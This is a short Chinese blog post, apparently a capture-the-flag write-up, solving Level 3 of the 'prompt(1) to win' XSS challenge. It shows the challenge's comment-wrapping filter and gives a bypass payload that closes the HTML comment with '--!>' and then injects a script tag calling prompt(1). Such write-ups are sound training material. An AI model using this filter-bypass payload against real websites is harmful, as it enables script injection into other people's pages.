加载中...

【prompt(1) to win】 Level 3 - HTML Comment



题目

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');

    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}

解题思路

正则把 -> 过略了,导致我们无法闭合注释。

但是 HTML 注释还有另一种闭合方式:<!-- xxxxx --!>

因此构造这样的 payload 即可实现绕过:--!><script>prompt(1)</script>

答案下载


文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
  目录